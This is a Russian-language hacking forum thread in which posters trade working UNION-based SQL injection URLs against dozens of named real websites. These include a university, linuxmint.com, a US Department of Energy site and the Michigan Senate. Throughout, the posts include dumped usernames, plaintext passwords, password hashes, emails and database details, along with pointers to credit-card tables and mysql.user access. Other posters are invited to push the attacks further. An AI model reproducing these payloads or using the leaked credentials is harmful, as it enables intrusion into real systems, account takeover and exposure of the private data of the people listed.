SQL Инъекции

На этом я встал...

помогите подобрать столбик с паролями пожалуйста

 

Code:

http://www.mai.ru/colleges/fac_9/k902/symp/razdel.php?id_razd=7'+and+1=0+UNION+SELECT+1,2,concat_ws(0x3a,login,psw),4,5,6,email+from+users+where%20+id=%22119%22/*

kaka123321123321:qwertyui
tdv:FdsuL45
Potapov:alexPOT
Kit:signal
flag:gikgik
Мерзляков:195021
Фрумен-СПбГМТУ:frfrfr
Gumer:160949
Kasyanov:vuy391y
julia:27011954
Юрий:sonovYP
SamsonovYP:03071948
и т.д
большиство пассов также подходит к мыльникам которые видны в инъекции
З.Ы очень приятная скуля)

 

mcc21:mcc21@localhost:4.0.24

db_shale01:shale01@localhost:4.0.24-standard

 

SQL-Inj:

Code:

http://superski.ru/adm/show.php?news_id=1193-1

Code:

http://superski.ru/adm/show.php?news_id=1193+order+by+7

Code:

http://superski.ru/adm/show.php?news_id=-1193+union+select+1,2,3,4,5,6,7

Code:

http://superski.ru/adm/show.php?news_id=-1193+union+select+1,2,concat_ws(0x3a,version(),user()),4,5,6,7

5.0.45-log:[email protected]

f0rum ipb

Code:

http://superski.ru/adm/show.php?news_id=-1193+union+select+1,2,count(*),4,5,6,7+from+ipb_members

4971 users

Code:

http://superski.ru/adm/show.php?news_id=-1193+union+select+1,2,concat_ws(0x3a,name,password,email),4,5,6,7+from+ipb_members+where+id+like+0x31

adminassWord123

 

dzd_den:dzd_den@localhost:4.1.22-standard

 

EEстония

Code:

http://www.gi.ee/index.php?page=6&id=-1)+union+select+1,2,3,4,5,concat(table_schema,0x3a,table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.columns+where+column_name=0x70617373776F7264+--+  

gi:autokalender_users

Code:

http://www.gi.ee/index.php?page=6&id=-1)+union+select+1,2,3,4,5,column_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.columns+where+table_schema=0x6769+and+table_name=0x6175746F6B616C656E6465725F7573657273+limit+0,1+--+

uid
username
password
email

Code:

http://www.gi.ee/index.php?page=6&id=-1)+union+select+1,2,3,4,5,concat_ws(0x3a,uid,username,password,email),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+gi.autokalender_users+limit+0,1+--+

Code:

1:admin:password:2:

 

www.linuxmint.com

Code:

http://www.linuxmint.com/mirrors.php?id=-1+union+select+1,2,3,concat(table_schema,char(58),table_name),5,6+from+information_schema.columns+where+column_name=0x70617373776F7264+limit+0,1/*

lms13:admin

Code:

http://www.linuxmint.com/mirrors.php?id=-1+union+select+1,2,3,concat_ws(0x3a,login,password),5,6+from+lms13.admin+limit+0,1/*

Пасс менялся несколько раз

Code:

clem:jolicoeur

The Y12 National Security Complex

www.y12.doe.gov

Code:

http://www.y12.doe.gov/news/release.php?id=30+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10+--+

5.0.33-log:[email protected]:y12doegov
Дальше думаю разберетесь

 

Code:

http://suvd.ru/news.php?id=-1+order+by+14/*

официальный сайт сочинской милиции

Code:

http://www.lacie.com.ru/product/mon.php?id=-30+union+select+1,2,3,4,5,6,database(),8,version()  ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,user  (),26,27,28,29,30,31,32,33,34,35,36,37,38/*

web@localhost
4.1.20-standard-log

Code:

http://trals.ru/1.php?id=-7+union+select+1,user(),3,4,5,6,7/*

tralsru5_u57649@localhost

Code:

http://www.polimernm.ru/partner.php?pid=-1+union+select+1,concat(user,0x3a,pass),5,6,5+from  +login/*

Code:

http://www.russned.ru/parts.php?ID=-1+order+by+5/*

 

http://www.toofaced.com/ - что-то очень гламурное...

Code:

http://www.toofaced.com/product.asp?cat_id=-1+union+select+1,2,concat_ws(char(58),username,email,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+vendor_logins+limit+0,1/*

123:[email protected]:vtest
PBONTA:[email protected]bontario
PBORAN:[email protected]:ORANGE
PBIRV:[email protected]:3881
PB1SAN:[email protected]:123456
...
и т.д. лимитом

 

www.gamato.gr

Интересный сайтик
БД 5'ой ветки.

Tables:

Code:

ID
NICK
PASSWORD
EMAIL
ICQ

Code:

http://www.gamato.gr/pictures.php?iid=-1)+union+select+1,2,3,4,concat_ws(0x3a,ID,NICK,PASSWORD,EMAIL,ICQ),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+gamato_fileish.f_users+limit+0,1+--+

admin:eac3a72a92235afabb94b33c3e23e8f0

www.expo.chelsi.ru

Code:

  http://expo.chelsi.ru/mainexpo.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+

5.0.26-lk-log:chelsiru_expo@localhost:chelsiru_expo

 

Фонд стратегической культуры

Code:

http://www.fondsk.ru/article.php?id=-1+union+select+aes_decrypt(aes_encrypt(user(),0x71),0x71),123456789/*

[email protected]:5.0.45-log

Code:

http://www.safemaster.ru/verinfo.php?id=9999999+union+select+1,concat_ws(char(58),user(),database(),version())/*

[email protected]:u21044:5.0.45-log

Code:

http://www.100cotton.ru/index.php?id=-1+union+select+1,2,3,4,5,6,version(),database(),session_user(),10,11,12,13,14,15,16,17,18,19,20/*

siteis_user@localhost:4.1.22-standard

 

Code:

http://www.challenge-tv.com/index.php?mode=filedetail&file=-1+union+select+1,2,convert(table_name+using+latin1),4,5,6,7,8,9,10+from+information_schema.tables+where+table_name+like+char(0x61,0x64,0x6d,0x69,0x6e,0x25)+limit+0,1/*

З.Ы.

Code:

http://www.challenge-tv.com/index.php?mode=filedetail&file=-1+union+select+1,2,convert(concat_ws(0x3a,ID,username,password,nick,email)+using+latin1),4,5,6,7,8,9,10+from+bouncer.users+limit+0,1/*

http://www.challenge-tv.com/index.php?mode=filedetail&file=-1+union+select+1,2,convert(concat_ws(0x3a,ID)+using+latin1),4,5,6,7,8,9,10+from+dennis.admin+limit+0,1/*

Не пускают

 

Code:

http://www.nalivaiko.ru/tovar.php?id=-1+union+select+concat(username,0x3a,password),2+from+admin/*

Oksana : oKSANA

Code:

http://baikal-iwf.com/main/bar.php?id=-1+union+select+1,concat(username,0x3a,password),3+from+users/*

test : test

 

Суздаль
http://www.suzd.net/

Code:

http://www.suzd.net/news.php?id=-1+union+select+1,2,3,4,5,password+from+admins/*

Пароль админа : cdthrf56

Code:

http://www.suzd.net/news.php?id=-1+union+select+1,2,3,4,5,table_name+from+INFORMATION_SCHEMA.TABLES/*

табицы

Code:

http://www.suzd.net/news.php?id=-1+union+select+1,2,3,4,5,6+from+creditcards/*

creditcards - интересно...

Code:

http://www.suzd.net/news.php?id=-1+union+select+1,2,3,4,5,concat(id,1,11,1111,1111111)+from+creditcards/*

p.s: раньше я задавал много тупых вопросов, репа была -31. потихоньку исправляюсь, пошёл в гору
и еще: этот пост большой и предыдущий тоже, поэтому я их и не объеденил. этот пост про www.suzd.net

 

mara.by


http://www.mara.by/index.php?mode=detail&id=-1'+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/*

4.0.18-standard-log/

http://www.mara.by/index.php?mode=detail&id=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,concat_ws(0x2F,login,password),29,30,31,32,33,34,35,36,37,38,39,40,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+user+limit+1010,1/*

логин/хеш 1013 юзеров

 

Code:

http://www.abandoned.ru/pic.php?id=-1+union+select+1,2,3,concat_ws(char(58),user(),version(),database()),5,6/*

uryevich@localhost:4.0.18:abando



Казанский государственный университет (КГУ)

Code:

http://www.ksu.ru/tatnews.php?id=-20+union+select+1,2,3,4,concat_ws(char(58),user(),version(),database()),6,7,8,9,10,11/*

miu@localhost:4.0.18-log:kgu200

Code:

http://ecom-info.spb.ru/news/print.php?id=-773+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(char(58),user(),version(),database()),16,17,18,19,20,21,22,23,24,25,26/*

ecom@localhost:5.0.24a:ecom

 

Code:

http://www.pocomaxa-extreme.ru/content/article.php?id=-1+union+select+1,user(),3,4,5,6,7,8,9,10,11/*

pocomaxa@localhost

 

4job.ru

Code:

http://www.4job.ru/index.php?vac_id=-54183+union+select+concat(id,char(58),password)+from+users+limit+0,1/*

Версия - 4.1.22
Юзер - job4@localhost
Есть доступ к mysql.user

trailersbyniche.com

Code:

http://www.trailersbyniche.com/trailers_sites.php?categoryid=-21+union+select+1,2,aes_decrypt(aes_encrypt(concat(username,0x3a,password),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+users/*

Версия - 4.1.16
Юзер - VIKING@LEASE631
Опять же можно прочитать данные из mysql.user

systema.ru

Code:

http://www.systema.ru/inc/bkard.php?Id=-6+union+select+1,2,3,4,user,password+from+mysql.user/*

Версия - 5.0.24a
Юзер - [email protected]
5-ая ветка, соответственно можно прочитать из information_schema.tables, но из таблиц прочитать что-либо нельзя...
Зато существует доступ к mysql.user:
root - *A7CEC0AA91C37E406E05D39C4BC7C4B4B6064715
admin - *CE2618670420A28D6B759E9E0B8AE253F50DFD5B: nimda

znamenitosti.tv

Code:

http://znamenitosti.tv/base.php?content=index&language=ru&letter=-%D0%9E'+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,user(),16/*

Версия - 5.0.27-log
Юзер - [email protected]
Опять 5-ая ветка, но вновь облом, совершенно никаких таблиц с интересной информацией...

 

Сенат
www.senate.michigan.gov

Code:

http://www.senate.michigan.gov/whitmer/transcript.php?id=1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12/*

5.0.37-community-nt:demdba@localhost:caucusweb
Дальше всем известный сценарий.

 

Code:

http://www.clarionrus.ru/news.php?id=-51+union+select+1,2,3,concat_ws(char(58),user(),version(),database()),5,6/*

clarionrus@localhost:4.1.20-lk-log:clarionrus

Code:

http://www.comingsoon.net/films.php?id=-8437+union+select+1/*

comingso_nextra@csnet-node1-internal:4.1.22:comingso_nextra

Code:

http://www.linspire.com/lindows_news_pressreleases_archives.php?id=-213+union+select+concat_ws(char(58),user(),version()),2/*

[email protected]:4.0.24-standard-log




Может кто разберется и раскрутит:

Code:

http://www.mtas.ru/second.php?ID=-13+union+select+1/*

Code:

http://www.planeta.tc/content.php?id=81+union+select+1,2,3,4,5,6,7,8,9,10,11/*